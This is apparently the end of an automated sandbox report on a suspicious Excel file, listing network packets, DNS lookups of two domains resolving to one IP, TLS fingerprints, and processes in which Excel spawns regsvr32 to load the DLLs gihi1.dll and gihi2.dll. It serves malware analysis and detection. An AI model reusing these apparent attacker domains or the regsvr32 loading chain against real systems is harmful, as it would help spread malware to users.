                                                                                                                                                Jun 23, 2021 18:06:41.369451046 CEST49720443192.168.2.350.116.92.246
                                                                                                                                                Jun 23, 2021 18:06:41.370553970 CEST49720443192.168.2.350.116.92.246
                                                                                                                                                Jun 23, 2021 18:06:41.571372032 CEST4434972050.116.92.246192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:41.731375933 CEST4434972050.116.92.246192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:41.731544971 CEST49720443192.168.2.350.116.92.246
                                                                                                                                                Jun 23, 2021 18:06:41.731959105 CEST4434972050.116.92.246192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:41.732063055 CEST49720443192.168.2.350.116.92.246
                                                                                                                                                Jun 23, 2021 18:08:26.685466051 CEST49720443192.168.2.350.116.92.246
                                                                                                                                                Jun 23, 2021 18:08:26.686060905 CEST49718443192.168.2.350.116.92.246
                                                                                                                                                Jun 23, 2021 18:08:27.073496103 CEST49718443192.168.2.350.116.92.246
                                                                                                                                                Jun 23, 2021 18:08:27.073510885 CEST49720443192.168.2.350.116.92.246
                                                                                                                                                Jun 23, 2021 18:08:27.760927916 CEST49718443192.168.2.350.116.92.246
                                                                                                                                                Jun 23, 2021 18:08:27.776572943 CEST49720443192.168.2.350.116.92.246
                                                                                                                                                Jun 23, 2021 18:08:29.120488882 CEST49718443192.168.2.350.116.92.246
                                                                                                                                                Jun 23, 2021 18:08:29.167289019 CEST49720443192.168.2.350.116.92.246
                                                                                                                                                Jun 23, 2021 18:08:31.823863983 CEST49718443192.168.2.350.116.92.246
                                                                                                                                                Jun 23, 2021 18:08:31.933202982 CEST49720443192.168.2.350.116.92.246
                                                                                                                                                Jun 23, 2021 18:08:37.230602026 CEST49718443192.168.2.350.116.92.246
                                                                                                                                                Jun 23, 2021 18:08:37.465051889 CEST49720443192.168.2.350.116.92.246
                                                                                                                                                Jun 23, 2021 18:08:48.028306961 CEST49718443192.168.2.350.116.92.246
                                                                                                                                                Jun 23, 2021 18:08:48.512784004 CEST49720443192.168.2.350.116.92.246

                                                                                                                                                UDP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Jun 23, 2021 18:06:23.664228916 CEST5062053192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:06:23.713363886 CEST53506208.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:24.682568073 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:06:24.731908083 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:25.618069887 CEST6015253192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:06:25.667390108 CEST53601528.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:26.730951071 CEST5754453192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:06:26.777827978 CEST53575448.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:27.519864082 CEST5598453192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:06:27.583985090 CEST53559848.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:28.997977972 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:06:29.063281059 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:30.037377119 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:06:30.098592997 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:34.493899107 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:06:34.543447018 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:35.534989119 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:06:35.582889080 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:36.730439901 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:06:36.776473045 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:06:36.831887960 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:36.845243931 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:37.173702955 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:06:37.246259928 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:38.225733042 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:06:38.307585955 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:39.275384903 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:06:39.321357965 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:39.710654974 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:06:39.759449005 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:39.846254110 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:06:39.893533945 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:40.596885920 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:06:40.646013975 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:40.810590029 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:06:40.866476059 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:41.271965981 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:06:41.335206985 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:41.465816975 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:06:41.523857117 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:43.177997112 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:06:43.227269888 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:44.116589069 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:06:44.162642956 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:45.320183992 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:06:45.322139025 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:06:45.369821072 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:45.375200987 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:47.573370934 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:06:47.635952950 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:49.231787920 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:06:49.278213024 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:06:59.244256973 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:06:59.318264008 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:07:00.908744097 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:07:00.974817991 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:07:18.674618959 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:07:18.731379986 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:07:24.918052912 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:07:25.097094059 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:07:25.732714891 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:07:25.870702028 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:07:26.493143082 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:07:26.542345047 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:07:26.548388004 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:07:26.618968010 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:07:27.016933918 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:07:27.085400105 CEST53606338.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:07:28.126995087 CEST6129253192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:07:28.199645996 CEST53612928.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:07:29.197525024 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:07:29.265150070 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:07:30.011614084 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:07:30.078763962 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:07:30.881722927 CEST6194653192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:07:30.950952053 CEST53619468.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:07:32.350186110 CEST6491053192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:07:32.405780077 CEST53649108.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:07:32.894220114 CEST5212353192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:07:32.962826014 CEST53521238.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:07:50.461910963 CEST5613053192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:07:50.523675919 CEST53561308.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:08:17.077205896 CEST5633853192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:08:17.083893061 CEST5942053192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:08:17.093934059 CEST5878453192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:08:17.126348019 CEST53563388.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:08:17.136343956 CEST53594208.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:08:17.140419960 CEST53587848.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:08:17.784940958 CEST6397853192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:08:17.868340015 CEST53639788.8.8.8192.168.2.3
                                                                                                                                                Jun 23, 2021 18:08:19.499790907 CEST6293853192.168.2.38.8.8.8
                                                                                                                                                Jun 23, 2021 18:08:19.577018023 CEST53629388.8.8.8192.168.2.3

                                                                                                                                                DNS Queries

                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                Jun 23, 2021 18:06:39.846254110 CEST192.168.2.38.8.8.80x7c0aStandard query (0)carpascapital.comA (IP address)IN (0x0001)
                                                                                                                                                Jun 23, 2021 18:06:40.810590029 CEST192.168.2.38.8.8.80x6e45Standard query (0)gruasphenbogota.comA (IP address)IN (0x0001)

                                                                                                                                                DNS Answers

                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                Jun 23, 2021 18:06:39.893533945 CEST8.8.8.8192.168.2.30x7c0aNo error (0)carpascapital.com50.116.92.246A (IP address)IN (0x0001)
                                                                                                                                                Jun 23, 2021 18:06:40.866476059 CEST8.8.8.8192.168.2.30x6e45No error (0)gruasphenbogota.com50.116.92.246A (IP address)IN (0x0001)

                                                                                                                                                HTTPS Packets

                                                                                                                                                TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                Jun 23, 2021 18:06:40.216695070 CEST50.116.92.246443192.168.2.349718CN=*.carpascapital.com CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Fri May 21 05:30:14 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021Thu Aug 19 05:30:14 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                CN=R3, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USFri Sep 04 02:00:00 CEST 2020Mon Sep 15 18:00:00 CEST 2025
                                                                                                                                                CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Jan 20 20:14:03 CET 2021Mon Sep 30 20:14:03 CEST 2024
                                                                                                                                                Jun 23, 2021 18:06:41.195301056 CEST50.116.92.246443192.168.2.349720CN=gruasphenbogota.com CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Mon May 10 05:47:53 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021Sun Aug 08 05:47:53 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                CN=R3, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USFri Sep 04 02:00:00 CEST 2020Mon Sep 15 18:00:00 CEST 2025
                                                                                                                                                CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Jan 20 20:14:03 CET 2021Mon Sep 30 20:14:03 CEST 2024

                                                                                                                                                Code Manipulations

                                                                                                                                                Statistics

                                                                                                                                                Behavior

                                                                                                                                                Click to jump to process

                                                                                                                                                System Behavior

                                                                                                                                                General

                                                                                                                                                Start time:18:06:35
                                                                                                                                                Start date:23/06/2021
                                                                                                                                                Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                Imagebase:0x1330000
                                                                                                                                                File size:27110184 bytes
                                                                                                                                                MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                General

                                                                                                                                                Start time:18:06:41
                                                                                                                                                Start date:23/06/2021
                                                                                                                                                Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:regsvr32 ..\gihi1.dll
                                                                                                                                                Imagebase:0x1e0000
                                                                                                                                                File size:20992 bytes
                                                                                                                                                MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                General

                                                                                                                                                Start time:18:06:42
                                                                                                                                                Start date:23/06/2021
                                                                                                                                                Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:regsvr32 ..\gihi2.dll
                                                                                                                                                Imagebase:0x1e0000
                                                                                                                                                File size:20992 bytes
                                                                                                                                                MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Disassembly

                                                                                                                                                Code Analysis

                                                                                                                                                Reset < >